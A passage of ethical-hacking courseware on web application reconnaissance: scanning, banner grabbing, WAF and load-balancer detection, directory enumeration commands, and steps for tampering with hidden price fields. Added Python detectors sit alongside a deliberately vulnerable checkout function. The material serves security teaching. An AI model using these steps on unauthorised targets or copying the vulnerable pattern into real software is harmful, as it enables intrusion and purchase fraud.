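    address first, a private one next, under a TTL too short to be cached."""
    if _is_internal_name(name) or ttl > SHORT_TTL_SECONDS:
        return False
    public_first = all(not _is_internal_address(ip) for ip in first_answers)
    private_next = any(_is_internal_address(ip) for ip in second_answers)
    return public_first and private_next
```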
Web Application Hacking Methodology
The previous section discussed the security posture of web applications by analyzing various types of threats/attacks currently in use. Attackers perform these attacks using a detailed process called the hacking methodology. This section will describe the steps of the hacking methodology, explaining how attackers target web applications.
Attackers use the web application hacking methodology to gain knowledge of a particular web application to compromise it successfully. This methodology allows them to plan each step in detail to increase their chances of successfully hacking the application. Under this methodology, they do the following to collect detailed information about various resources needed to run or access the web application:

Footprint web infrastructure
Analyze web applications
Bypass client-side controls
Attack authentication mechanisms
Attack authorization schemes
Attack access controls
Attack session management mechanisms
Perform injection attacks
Attack application logic flaws
Attack shared environments
Attack database connectivity
Attack web application clients
Attack web services

If hackers do not use this process and try to exploit the web application directly, their chances of failure increase. The following phases of this module will provide a detailed explanation of how attackers derive information about these resources.
Footprint Web Infrastructure
Footprinting is the process of gathering complete information about a system and all its related components, as well as how they work. The web infrastructure of a web application is the arrangement by which it connects to other systems, servers, and so on in the network. Web infrastructure footprinting is the first step in web application hacking; it helps attackers to select victims and identify vulnerable web applications. Attackers footprint the web infrastructure to know how the web application connects with its peers and the technologies it uses and to find vulnerabilities in specific parts of the web application architecture. These vulnerabilities can help attackers to exploit and gain unauthorized access to the web application.

Footprinting the web infrastructure allows an attacker to engage in the following tasks:

Server Discovery: Attackers attempt to discover the physical servers that host web applications, using techniques such as Whois lookup, DNS interrogation, port scanning, and others to find services running on open ports and exploit them.

Server Identification: Attackers use banner grabbing to obtain the server banners, which help to identify the make and version of the web server software. Other information that this technique provides includes the following:

Local Identity: information such as the location of the server and the Origin-Host.

Local Addresses: the local IP addresses that the server uses for sending Diameter Capability Exchange messages (CER/CEA messages), including the server identity, capabilities, and other information such as protocol version number and supported Diameter applications.

Self-Names: this field specifies all the realms that the server considers as local and treats all the requests for them as no realm requests.

Hidden Content Discovery: Footprinting also allows attackers to extract content and functionality that is not directly linked to or reachable from the main visible content.

Load Balancers Detection: Attackers can detect load balancers of the target organization along with their real IP addresses to identify servers exposed over the Internet.
Server Discovery

To footprint a web infrastructure, first, you need to discover active Internet servers. Three techniques, namely Whois lookup, DNS interrogation, and port scanning, help in discovering the active servers and their associated information.

Whois Lookup

Whois lookup tools allow you to gather information about a domain with the help of DNS and Whois queries. They provide information about the IP address of the web server and DNS names. These tools produce results in the form of an HTML report. Use the following tools to perform Whois lookup:

Netcraft (https://www.netcraft.com)
WHOIS Lookup (http://whois.domaintools.com)
SmartWhois (https://www.tamos.com)
Batch IP Converter (http://www.sabsoft.com)
= DNS Interrogation
Organizations use DNS, which is a distributed database, to connect their IP addresses with their respective hostnames and vice versa. When the DNS is improperly configured, it is very easy to exploit it and gather the information required for launching an attack on a target organization. It provides information about the location and type of servers.
Use the following tools to perform DNS interrogation:
o Professional Toolset (https://tools.dnsstuff.com)
o DNS Records (https://network-tools.com)
o DNSRecon (https://github.com)
o Domain Dossier (https://centralops.net)
= Port Scanning
Port scanning is the process of scanning system ports to recognize open ones. It attempts to connect to a particular set of TCP or UDP ports to find out the service that exists on the server. If attackers recognize an unused open port, they can exploit it to intrude into the system.
Use the following tools to perform port scanning:
o Nmap (https://nmap.org)
o NetScanTools Pro (https://www.netscantools.com)
o Advanced Port Scanner (https://www.advanced-port-scanner.com)
o Hping (http://www.hping.org)
Service Discovery
Footprinting the web infrastructure provides data about the services offered, such as exchange of data, path of transmission, and encryption and protocols deployed. Scan the target web server to identify the common ports that it uses for different services. After finding these services, attackers can compromise them to exploit the web infrastructure that runs the application. The identified services act as attack paths for web application hacking.
The table below lists common ports used by web servers and their respective HTTP services:

Port | Typical HTTP Services
80 | World Wide Web standard port
81 | Alternate WWW
88 | Kerberos
(port not legible) | Remote Network Server System
443 | SSL (HTTPS)
514 | Remote Shell
625 | Open Directory Proxy (ODProxy)
657 | IBM RMC (Remote Monitoring and Control) Protocol
706 | Secure Internet Live Conferencing (SILC)
832 | NETCONF for SOAP over HTTPS
833 | NETCONF for SOAP over BEEP
900 | IBM Websphere administration client
981 | Remote HTTPS management for firewall devices running embedded Check Point VPN-1 software
987 | Microsoft Remote Web Workplace, a feature of Windows Small Business Server
1433 | MSSQL Server
1434 | MSSQL Monitor
1527 | Oracle Net Services
2301 | Compaq Insight Manager
2381 | Compaq Insight Manager over SSL
2638 | SQL Anywhere Database Server
4242 | Microsoft Application Center Remote management
7001 | BEA WebLogic
7002 | BEA WebLogic over SSL
7070 | Sun Java Web Server over SSL
8000 | Alternate web server or web cache
8001 | Alternate web server or management
8005 | Apache Tomcat
9090 | Sun Java Web Server admin module
10000 | Netscape Administrator interface
Table 14.1: Table displaying HTTP Services
Tools used for service discovery
= Nmap
Source: https://nmap.org
Nmap is a multi-platform, multi-purpose application used to perform footprinting of ports, services, operating systems, etc. It is used for network discovery and security auditing. It is useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.
Figure 14.39: Screenshot of Nmap
Some additional service discovery tools are as follows:
o NetScanTools Pro (https://www.netscantools.com)
o Sandcat Browser (http://www.syhunt.com)
Server Identification/Banner Grabbing
Banner grabbing is a footprinting technique used by a hacker to obtain sensitive information about a target. An attacker establishes a connection with the target and sends a pseudo-request to it. The target then replies to the request with a banner message that contains sensitive information required by the attacker to further penetrate the target.
Through banner grabbing, attackers identify the name and/or version of a server, operating system, or application. They analyze the server response header field to identify the make, model, and version of the web server software. This information helps them to select the appropriate exploits from vulnerability databases to attack the web server and its applications.
How an attacker can use telnet to establish a connection and gain banner information of a target is demonstrated below:
= The attacker issues the command telnet moviescope.com 80 in his/her machine's command prompt to establish a telnet connection with the target machine.
Note: The attacker can specify either the IP address or the domain name of the target in the telnet command.
Figure 14.40: An example of telnet command usage
= After establishing the connection, the attacker receives the prompt; it does not display any information.
= Now, the attacker will press the Esc key, which returns the banner message that displays information about the target server along with some miscellaneous information.
Figure 14.41: Server identified as nginx
This information helps attackers find ways to exploit target web servers and their applications.
Grabbing Banners from SSL Services
Tools such as Telnet and Netcat are capable of grabbing banners of web servers over only an HTTP connection. Attackers cannot grab banners over an SSL connection using the same techniques as those used for grabbing banners over HTTP connections. They can use tools such as OpenSSL to grab banners on web servers over an encrypted (HTTPS/SSL) connection.
Attackers perform the following steps to grab banners over an SSL connection:
o Step 1: Install OpenSSL
OpenSSL is a cryptography toolkit implementing the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) network protocols and the related cryptography standards required by them. It is available at https://www.openssl.org
o Step 2: Navigate to OpenSSL in the terminal
o Step 3:
Figure 14.42: Example of OpenSSL command
Figure 14.43: Result of OpenSSL banner grabbing
Some additional banner grabbing tools are as follows:
o Netcat (http://netcat.sourceforge.net)
o ID Serve (https://www.grc.com)
o Netcraft (https://www.netcraft.com)
Detecting Web App Firewalls and Proxies on Target Site
While footprinting the web infrastructure, attackers must discover the web application firewall and proxy settings of the target site to know the security measures employed.
Detecting Proxies
Some organizations use proxy servers in front of their web servers to make them untraceable. Therefore, when attackers try to trace the target's IP address, which is hidden behind a proxy, using footprinting techniques, the attempt would provide its proxy IP address and not its legitimate address.
Determine whether your target site is routing your requests through proxy servers. To know whether a web server is behind a proxy, attackers can use the trace command. The trace command sends a request to the web server, asking it to send back the request it received.
[Screenshot: response to the trace command]
Detecting Web Application Firewalls
Web application firewalls (WAFs) are security devices deployed between the client and the server. These devices are like IPS that provide security for web applications against a wide range of attacks. They monitor web server traffic and block malicious traffic, thus safeguarding web applications from attacks.
Attackers use different techniques to detect web application firewalls in the web infrastructure. One of these techniques involves examining the cookies because a few WAFs add their own cookies during client-server communication. Attackers can view the HTTP request cookie to observe the presence of a WAF.
Another method for detecting a WAF is by analyzing the HTTP header request. Most firewalls edit HTTP header requests; thus, the server response varies. Hence, an attacker sends a request to a web server, and when the server responds to the request, the response betrays the presence of the web application firewall.
Attackers use various tools such as WAFW00F to detect the presence of a WAF in front of a web server that hosts the target website.
= WAFW00F
Source: https://github.com
WAFW00F allows one to identify and fingerprint WAFs protecting a website. It detects a WAF at any domain by looking for the following:
o Cookies
o Server cloaking
o Response codes
o Drop action
o Pre-built-in rules
Figure 14.45: Screenshot of WAFW00F
You can also use the tools listed below to detect WAFs in the target web infrastructure:
o SHIELDFY Web Application Firewall Detector (https://shieldfy.io)
o WhatWaf (https://github.com)
o Nmap (https://nmap.org)
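The following Python script is an added example (not courseware code) of what the banner-grabbing and WAF-detection passages above describe, applied to one HTTP response: it splits the Server banner into product and version, and checks Set-Cookie names and response headers against a small signature table. The signature table is an example built from commonly documented cookie and header names, not WAFW00F's rule set, and both sample responses are constructed; run against your own servers it shows exactly what a footprinting pass learns from a single reply.

```python
import re

# Example WAF/CDN signatures (constructed table, not WAFW00F's rules):
# cookie-name prefixes and header names that some products add to responses.
WAF_COOKIE_PREFIXES = {
    "__cfduid": "Cloudflare",
    "incap_ses_": "Imperva Incapsula",
    "visid_incap_": "Imperva Incapsula",
}
WAF_HEADERS = {"cf-ray": "Cloudflare"}
WAF_SERVER_VALUES = {"cloudflare": "Cloudflare"}


def parse_response(raw: str) -> dict:
    """Split a raw HTTP response into status line, header list and body.
    Header names are lower-cased; repeated headers (Set-Cookie) are kept."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return {"status": lines[0], "headers": headers, "body": body}


def header_values(parsed: dict, name: str) -> list:
    return [v for n, v in parsed["headers"] if n == name]


# "nginx/1.18.0" -> product "nginx", version "1.18.0"; "cloudflare" -> no version
_BANNER_RE = re.compile(r"^([A-Za-z][\w.-]*)(?:/([\w.]+))?")


def analyze_banner(parsed: dict) -> dict:
    """What the Server header discloses. A disclosed version is what the
    Server Identification step feeds into vulnerability-database lookups,
    so a hardened server should send none (or no Server header at all)."""
    values = header_values(parsed, "server")
    if not values:
        return {"product": None, "version": None, "discloses_version": False}
    m = _BANNER_RE.match(values[0])
    product = m.group(1) if m else values[0]
    version = m.group(2) if m else None
    return {"product": product, "version": version,
            "discloses_version": version is not None}


def detect_waf(parsed: dict) -> list:
    """Collect WAF evidence from cookies, extra headers and server cloaking."""
    findings = set()
    for cookie in header_values(parsed, "set-cookie"):
        cookie_name = cookie.split("=", 1)[0].strip()
        for prefix, product in WAF_COOKIE_PREFIXES.items():
            if cookie_name.startswith(prefix):
                findings.add(product)
    for name, value in parsed["headers"]:
        if name in WAF_HEADERS:
            findings.add(WAF_HEADERS[name])
        if name == "server" and value.lower() in WAF_SERVER_VALUES:
            findings.add(WAF_SERVER_VALUES[value.lower()])
    return sorted(findings)


# Constructed sample responses (not captured from any real host).
PLAIN_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx/1.18.0\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: PHPSESSID=abc123; Path=/\r\n"
    "\r\n<html></html>"
)
WAF_RESPONSE = (
    "HTTP/1.1 403 Forbidden\r\n"
    "Server: cloudflare\r\n"
    "CF-RAY: 0000000000000000-EXAMPLE\r\n"
    "Set-Cookie: __cfduid=example; Path=/\r\n"
    "Set-Cookie: incap_ses_123_456=example; Path=/\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for raw in (PLAIN_RESPONSE, WAF_RESPONSE):
        p = parse_response(raw)
        print(p["status"], analyze_banner(p), detect_waf(p))
```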
Hidden Content Discovery
Hidden content and functionality not reachable from the main visible content can be discovered to exploit user privileges within the application. This allows an attacker to recover backup copies of live files, configuration files, and log files containing sensitive data, backup archives containing snapshots of files within the web root, new functionality that is not linked to the main application, etc.
The following methods are employed for discovering the hidden content:
= Web spidering/Crawling
Web spiders/crawlers automatically discover the hidden content and functionality by parsing HTML forms and client-side JavaScript requests and responses.
o OWASP Zed Attack Proxy
Source: https://www.owasp.org
OWASP Zed Attack Proxy (ZAP) is an integrated penetration testing tool for finding vulnerabilities in web applications. It offers automated scanners as well as a set of tools that allow you to find security vulnerabilities manually. Attackers use OWASP ZAP for web spidering/crawling to identify hidden content and functionality in the target web application.
Figure 14.46: Screenshot of OWASP ZAP
Some additional web spidering/crawling tools are as follows:
o Burp Suite (https://portswigger.net)
o WebScarab (https://www.owasp.org)
o Mozenda Web Agent Builder (https://www.mozenda.com)
o Octoparse (https://www.octoparse.com)
o Giant Web Crawl (http://80legs.com)
= Attacker-Directed Spidering
The attacker accesses all of the application's functionality and uses an intercepting proxy to monitor all requests and responses. The intercepting proxy parses all of the application's responses and reports the content and functionality it discovers.
Attacker-directed spidering tools:
o OWASP Zed Attack Proxy (https://www.owasp.org)
Detect Load Balancers
= Using host command
Type the following host command to determine whether the target domain is resolving to multiple IP addresses:
host <target domain>
Figure 14.47: Screenshot showing output of host command
= Using dig command
The dig command provides more detailed results than the host command. Type the following dig command to determine whether the target domain is resolving to multiple IP addresses:
dig <target domain>
Figure 14.48: Screenshot showing output of dig command
= Using load balancing detector (lbd)
Source: https://github.com
lbd (load balancing detector) detects if a given domain uses DNS and/or HTTP load balancing via the Server: and Date: headers and diffs between server answers. It analyzes data received from application responses to detect load balancers. Type the following command to detect load balancers of the target web application:
lbd <target domain>
Figure 14.49: Screenshot showing the output of lbd tool
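As an added example (not from the courseware or the lbd project), the function below applies the HTTP-side comparison lbd is described as making: given the header blocks of several back-to-back requests to one name, it reports a Server: header that changes between answers, or a Date: header that steps backwards or jumps more than a skew budget, either of which means more than one back-end clock answered. The response sets are constructed and the 2-second skew budget is an assumption.

```python
from email.utils import parsedate_to_datetime


def parse_headers(raw: str) -> dict:
    """Header block of one HTTP response -> {lower-cased name: value}."""
    headers = {}
    for line in raw.replace("\r\n", "\n").split("\n")[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def detect_http_load_balancing(responses, max_skew_seconds=2):
    """Apply lbd-style HTTP checks to responses captured in order.

    Evidence of a pool behind one name: the Server: header differs between
    answers, or the Date: header moves backwards / jumps more than the skew
    budget, which sequential answers from a single clock would not do."""
    servers, dates = [], []
    for raw in responses:
        h = parse_headers(raw)
        servers.append(h.get("server"))
        if "date" in h:
            dates.append(parsedate_to_datetime(h["date"]))
    reasons = []
    distinct = {s for s in servers if s is not None}
    if len(distinct) > 1:
        reasons.append("Server header varies: " + ", ".join(sorted(distinct)))
    for earlier, later in zip(dates, dates[1:]):
        delta = (later - earlier).total_seconds()
        if delta < 0 or delta > max_skew_seconds:
            reasons.append(f"Date header moved {delta:+.0f}s between requests")
            break
    return {"load_balanced": bool(reasons), "reasons": reasons}


def _resp(server: str, date: str) -> str:
    """Build a constructed response header block (no real host involved)."""
    return f"HTTP/1.1 200 OK\r\nServer: {server}\r\nDate: {date}\r\n\r\n"


# One host answering three times: same banner, clock moving forward.
SINGLE_HOST = [
    _resp("nginx", "Mon, 05 Oct 2020 10:00:00 GMT"),
    _resp("nginx", "Mon, 05 Oct 2020 10:00:01 GMT"),
    _resp("nginx", "Mon, 05 Oct 2020 10:00:01 GMT"),
]
# A pool: a second node with a different banner and a clock 20 s behind.
POOL = [
    _resp("nginx", "Mon, 05 Oct 2020 10:00:00 GMT"),
    _resp("Apache", "Mon, 05 Oct 2020 09:59:40 GMT"),
    _resp("nginx", "Mon, 05 Oct 2020 10:00:02 GMT"),
]

if __name__ == "__main__":
    print(detect_http_load_balancing(SINGLE_HOST))
    print(detect_http_load_balancing(POOL))
```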
= Using Halberd
Source: https://github.com
You can use Halberd to identify the real IP address of load balancers. When organizations implement load balancers, their real IP address is hidden behind a virtual IP address. Once the attackers determine that the target organization is using load balancers, they try to identify the real IP address of the load balancers. Halberd can be used to discover HTTP load balancers and their IP addresses. Type the following command to identify the real IP address of the load balancers:
halberd <target domain>
Figure 14.50: Screenshot showing the output of Halberd tool
After identifying the real IP addresses behind the load balancers, attackers perform further attacks on the target organization.
Analyze Web Applications
[Slide: Analyze Web Applications: Identify Entry Points for User Input]
[Slide: Analyze Web Applications: Identify Server-Side Technologies]
[Slide: Analyze Web Applications: Identify Server-Side Functionality]
[Slide: Analyze Web Applications: Identify Files and Directories]
[Slide: Analyze Web Applications: Identify Web Application Vulnerabilities]
[Slide: Analyze Web Applications: Map the Attack Surface]
= Identify Server-Side Technologies: Commonly used server-side technologies include Active Server Pages (ASP), ASP.NET, ColdFusion, JavaServer Pages (JSP), PHP, Python, and Ruby on Rails. Attackers can fingerprint the technologies active on the server using various fingerprint techniques such as HTTP fingerprinting.
= Identify Server-Side Functionality: Server-side functionality refers to the ability of a server to execute programs on output web pages. User requests stimulate the scripts residing on the web server to display interactive web pages or websites. The server executes server-side scripts, which are invisible to the user. Attackers should evaluate the server-side structure and functionality by keenly observing the applications revealed to the client.
= Identify Files and Directories: Web servers host web applications, and misconfigurations while hosting these web applications may lead to exposure of critical files and directories over the Internet. Attackers identify the target web application's files and directories exposed on the Internet using various automated tools such as Gobuster. Such information further helps attackers gather sensitive information stored in the files and folders.
= Identify Web Application Vulnerabilities: Web applications are developed using various technologies and platforms. Not following secure coding practices in the development of web applications may leave flaws that can be exploited to perform various types of attacks.
= Map the Attack Surface: Attackers then map the attack surface of the web application to target specific vulnerable areas. They identify the various attack surfaces uncovered by the applications as well as the vulnerabilities associated with them.
Identify Entry Points for User Input
Web application input gates help attackers launch various types of injection attacks on the application. If such input gates are vulnerable to attacks, gaining access to the application is easy. Thus, during web application analysis, attackers try to identify entry points for user input so that they can understand how the web application accepts or handles the user input. Attackers examine the URL, HTTP header, query string parameters, POST data, and cookies to determine all the user input fields. They also identify HTTP header parameters that can be processed by the application as user inputs, such as User-Agent, Referer, Accept, Accept-Language, and Host. Furthermore, they determine URL encoding techniques and other encryption measures implemented to secure web traffic, such as SSL. Then, they can find the vulnerabilities present in the input mechanism and exploit them to gain access to the web application.
Use the following tools to analyze the web application:
= Burp Suite (https://portswigger.net)
= WebScarab (https://www.owasp.org)
= OWASP Zed Attack Proxy (https://www.owasp.org)
= httprint (https://www.net-square.com)
Identify Server-Side Technologies
= Perform detailed server fingerprinting and analyze the HTTP headers and HTML source code to identify server-side technologies
= Examine URLs for file extensions, directories, and other identification information
= Examine the error page messages
= Examine session tokens: JSESSIONID - Java, ASPSESSIONID - IIS server, ASP.NET_SessionId - ASP.NET, PHPSESSID - PHP
= Use tools such as httprint and WhatWeb to identify server-side technologies
Figure 14.51: Screenshot displaying an ASP.NET server error message
= httprint
Source: https://www.net-square.com
Figure 14.52: Screenshot of httprint
= WhatWeb
Source: https://github.com
WhatWeb scans and identifies web technologies, including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1800 plugins, each of which recognizes something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.
Figure 14.53: Screenshot showing output of WhatWeb
Identify Server-Side Functionality
After determining the server-side technologies, attackers try to identify the server-side functionality to find potential vulnerabilities. They examine the page source and URLs and make educated guesses to determine the internal structure and functionality of web applications. They use the following tools to do so.
= GNU Wget
Source: https://www.gnu.org
GNU Wget is employed for retrieving files using HTTP, HTTPS, and FTP, which are the most widely used Internet protocols. It is a non-interactive command-line tool; hence, it can be called from scripts, cron jobs, and terminals without X-Windows support.
Figure 14.54: Screenshot displaying GNU Wget command line utility tool
= BlackWidow (http://softbytelabs.com)
= Teleport Pro (http://www.tenmax.com)
Examine URL
An SSL certified page URL starts with https instead of http. If a page contains a .aspx extension, the application is likely written using ASP.NET. If the query string has a parameter named showBy, then you can assume that the application is using a database and will display the data by that value.
Figure 14.55: Identify Server Functionality by examining URL
Identify Files and Directories
Use tools such as Gobuster and URL Fuzzer and the Nmap NSE script http-enum to identify files and directories of the target web application.
= Gobuster
Source: https://github.com
Gobuster is a Go-programming-based directory scanner that allows attackers to perform fast-paced enumeration of hidden files and directories of a target web application. It is a command-oriented tool used to brute-force URIs in websites, DNS subdomains, names of virtual hosts on the target server, etc.
Run the following command to retrieve file and directory names and their status codes:
gobuster -u <target URL> -w common.txt
Figure 14.56: Screenshot showing the output of Gobuster
Use the -l flag to retrieve the length of the body along with files and directories:
gobuster -u <target URL> -w common.txt -l
/.htpasswd (Status: 403) [Size: 410]
/.htaccess (Status: 403) [Size: 410]
Figure 14.57: Screenshot showing the output of Gobuster tool
Use the -s flag to retrieve files and directories related to specific status codes:
gobuster -u <target URL> -w common.txt -s 200
Figure 14.58: Screenshot showing the output of Gobuster tool
Similarly, the -q and -n flags can provide a quick view of the directories without banner and status codes. You can also output the result to an output file using the -o flag.
= Nmap
Source: https://nmap.org
Attackers use the Nmap NSE script http-enum to enumerate applications, directories, and files of web servers that are exposed on the Internet. Thus, they can identify critical security vulnerabilities in the target web application. Run the following Nmap command to gather information about the exposed files and directories of the target web server:
nmap -sV --script=http-enum <target domain or IP address>
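Added defender-side example covering both the Gobuster and the http-enum passages above (not courseware code): wordlist enumeration of files and directories leaves a burst of 403/404 responses, often including dotfile probes such as /.htaccess and /.htpasswd, and this script reads combined-format access log lines and flags clients whose not-found rate or dotfile probing exceeds a threshold. The log lines, client addresses and thresholds are constructed for the example.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" access log format (constructed sample lines below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Paths whose last segment starts with a dot: /.htaccess, /.git, /.env ...
DOTFILE_RE = re.compile(r"/\.[^/]+$")


def parse_line(line: str):
    """Return the fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def find_enumeration(lines, min_requests=10, miss_ratio=0.8, dotfile_hits=2):
    """Return {ip: summary} for clients that look like wordlist scanners:
    many requests that are mostly 403/404, and/or repeated dotfile probes.
    Thresholds are assumptions to tune per site."""
    per_ip = defaultdict(lambda: {"total": 0, "misses": 0,
                                  "dotfiles": 0, "paths": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        s = per_ip[rec["ip"]]
        s["total"] += 1
        if rec["status"] in (403, 404):
            s["misses"] += 1
        if DOTFILE_RE.search(rec["path"]):
            s["dotfiles"] += 1
        s["paths"].add(rec["path"])
    flagged = {}
    for ip, s in per_ip.items():
        ratio = s["misses"] / s["total"]
        if (s["total"] >= min_requests and ratio >= miss_ratio) \
                or s["dotfiles"] >= dotfile_hits:
            flagged[ip] = {"requests": s["total"],
                           "miss_ratio": round(ratio, 2),
                           "dotfiles": s["dotfiles"],
                           "distinct_paths": len(s["paths"])}
    return flagged


def _log(ip: str, path: str, status: int) -> str:
    """Constructed combined-format line (documentation address ranges)."""
    return (f'{ip} - - [05/Oct/2020:10:00:00 +0000] "GET {path} HTTP/1.1" '
            f'{status} 410 "-" "Mozilla/5.0"')


# A scanner walking a wordlist, and an ordinary visitor.
SAMPLE_LOG = [_log("203.0.113.5", p, st) for p, st in [
    ("/index.html", 200), ("/admin", 404), ("/backup", 404), ("/cgi-bin/", 404),
    ("/.htpasswd", 403), ("/.htaccess", 403), ("/old", 404), ("/test", 404),
    ("/tmp", 404), ("/uploads", 404), ("/config", 404), ("/dev", 404),
]] + [_log("198.51.100.7", p, 200) for p in ["/", "/index.html", "/about"]]

if __name__ == "__main__":
    for ip, summary in find_enumeration(SAMPLE_LOG).items():
        print(ip, summary)
```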
Identify Web Application Vulnerabilities
Attackers use various techniques to detect vulnerabilities in target web applications hosted on web servers to gain administrator-level access to the server or retrieve sensitive information stored on the server. They scan applications for identifying vulnerabilities and detect attack surfaces on the target applications. Performing comprehensive vulnerability scanning can disclose security flaws associated with executables, binaries, and technologies used in a web application. Through vulnerability scanning, attackers can also catalog different vulnerabilities, prioritize them based on their threat levels, and use them while targeting an application.
Attackers can use tools such as Vega, WPScan Vulnerability Database, Arachni, and Uniscan to identify vulnerabilities in the target web applications.
= Vega
Source: https://www.subgraph.com
Vega is a free and open-source web security scanner and web security testing platform for testing the security of web applications. Vega helps you to find and validate SQL injection, cross-site scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java and is GUI-based, and it runs on Linux, OS X, and Windows. Vega also helps you to find vulnerabilities such as reflected cross-site scripting, stored cross-site scripting, blind SQL injection, remote file include, shell injection, and others. It also probes TLS/SSL security settings and identifies opportunities for improving the security of your TLS servers.
Figure 14.61: Screenshot of Vega
Some additional web application vulnerability scanning tools are as follows:
= WPScan Vulnerability Database (https://wpvulndb.com)
= Arachni (https://www.arachni-scanner.com)
= AppSpider (https://www.rapid7.com)
= Uniscan (https://sourceforge.net)
Map the Attack Surface
Once the attackers detect the entry points, server-side technologies, and functionalities, they can find their respective vulnerabilities and map the attack surface area of the target web application. Web application analysis thus helps attackers reduce their attack surface. Attackers consider the following factors in planning their attack.

Information | Attack
Client-Side Validation | Injection Attack, Authentication Attack
Database Interaction | SQL Injection, Data Leakage
File Upload and Download | Directory Traversal
Display of User-Supplied Data | Cross-Site Scripting
Dynamic Redirects | Redirection, Header Injection
Login | Username Enumeration, Password Brute-Force Attack
Session State | Session Hijacking, Session Fixation
Access Controls | Privilege Escalation
Cleartext Communication | Data Theft, Session Hijacking
Error Message | Information Leakage
Email Interaction | Email Injection
Application Code | Buffer Overflows
Third-Party Application | Known Vulnerabilities Exploitation
Web Server Software | Known Vulnerabilities Exploitation
Table 14.2: Table showing information and respective attacks
[Slide: Bypass Client-side Controls]
[Slide: Bypass Client-side Controls: Attack Hidden Form Fields]
[Slide: Bypass Client-side Controls: Attack Browser Extensions]
[Slide: Bypass Client-side Controls: Perform Source Code Review]
[Slide: Bypass Client-side Controls: Evade XSS Filters]
Bypass Client-side Controls
A web application requires client-side controls to restrict user inputs when transmitting data via client components and implementing measures to control the user's interaction with his or her own client. A developer uses techniques such as hidden HTML form fields and browser extensions to allow the transmission of data to the server via the client. Often, web developers assume that the data transmitted from the client to the server is within the user's control, and this assumption can make the application vulnerable to various attacks.
Some of the techniques to bypass the client-side controls are as follows:
= Attack Hidden Form Fields: Identify the hidden form fields on the web page and manipulate the tags and fields to exploit the web page before transmitting the data to the server.
= Attack Browser Extensions: Attempt to intercept the traffic from the browser extensions or decompile the browser extensions to capture user data.
= Perform Source Code Review: Perform source code review to identify vulnerabilities in the code that cannot be identified by traditional vulnerability scanning tools.
= Evade XSS Filters: Evade XSS filters by injecting unusual characters into the HTML code.
Attack Hidden Form Fields
E-commerce/retailing web applications use hidden HTML form fields to restrict the user from viewing/modifying data fields such as "products" and "prices of products" and allow the user to enter certain fields such as "quantity," assuming that the user enters the required quantity before submitting data to the server. The developer flags these fields as hidden to restrict the user from modifying them. In every client session, developers use hidden fields to store client information, including product prices and discount rates.
Follow the process described below to attack hidden form fields:
= Identify vulnerable web applications
= Save the source code for the HTML page
= Locate the hidden field with the price
= Tamper with the price field's value by editing the source file and reload the source into a browser
= Click the Buy button
= Use tools such as Burp Suite to trap the request that submits the form and modify the price field to any value. In addition, you can attempt to enter negative price values to trick the retail application into refunding the amount through credit card transactions.
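Added example, not courseware code: the server-side half of the hidden-field attack described above, written as two Python checkout handlers. The vulnerable handler trusts the hidden price field as the browser sent it (so an edited or negative price is honoured in the total); the hardened handler accepts only a product ID and quantity, looks the price up in a server-side catalog and validates the quantity, which is the control that makes editing the page or trapping the request pointless. The catalog and the form submissions are constructed.

```python
import logging
from decimal import Decimal

# Constructed server-side catalog (product id -> unit price). In a real shop
# this is read from the database; it never comes from the submitted form.
CATALOG = {"sku-100": Decimal("49.99"), "sku-200": Decimal("5.00")}


def checkout_vulnerable(form: dict) -> Decimal:
    """Trusts the hidden 'price' field exactly as the browser sent it.
    A saved-and-edited page or a trapped POST sets the price; a negative
    value yields a negative total, i.e. the 'refund' the text describes."""
    return Decimal(form["price"]) * int(form["quantity"])


class InvalidOrder(ValueError):
    """Raised for any submission the hardened handler will not price."""


def checkout_hardened(form: dict) -> Decimal:
    """Accepts only product_id and quantity; the price is looked up
    server-side. A client-supplied price is logged as tampering evidence
    and otherwise ignored."""
    product_id = form.get("product_id")
    if product_id not in CATALOG:
        raise InvalidOrder("unknown product")
    try:
        qty = int(form.get("quantity", ""))
    except ValueError:
        raise InvalidOrder("quantity is not an integer") from None
    if not 1 <= qty <= 99:
        raise InvalidOrder("quantity out of range")
    if "price" in form:
        logging.warning("client-supplied price %r ignored for %s",
                        form["price"], product_id)
    return CATALOG[product_id] * qty


# Constructed submissions: honest, price edited down to a cent, price negated.
HONEST = {"product_id": "sku-100", "price": "49.99", "quantity": "1"}
TAMPERED = {"product_id": "sku-100", "price": "0.01", "quantity": "1"}
NEGATIVE = {"product_id": "sku-100", "price": "-49.99", "quantity": "2"}

if __name__ == "__main__":
    for name, form in (("honest", HONEST), ("tampered", TAMPERED),
                       ("negative", NEGATIVE)):
        print(name, "vulnerable:", checkout_vulnerable(form),
              "hardened:", checkout_hardened(form))
```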
Attack Browser Extensions
The data from a web application that uses browser extension components can be captured by two methods:
= Intercepting Traffic from Browser Extensions
Attempt to intercept and modify the request and response of the component and the server, respectively. You can use tools such as Burp Suite to capture the data. This method has certain limitations such as data obfuscation or encryption, and secure data serialization.
= Decompiling Browser Extensions
Using this technique, you can attempt to decompile the component's bytecode to view its detailed source, which allows you to identify the detailed information of the component functionality. The main advantage of this technique is that it allows you to modify data present in the requests that are sent to the server, regardless of any obfuscation or encryption mechanisms employed for the transmitted data.
You can use proxy tools such as Burp Suite to capture and modify the web page component requests. In the context of bypassing client-side input validation that is implemented in a browser extension, if the component submits the validated data to the server transparently, this data can be modified using an intercepting proxy in the same way as that described for HTML form data.
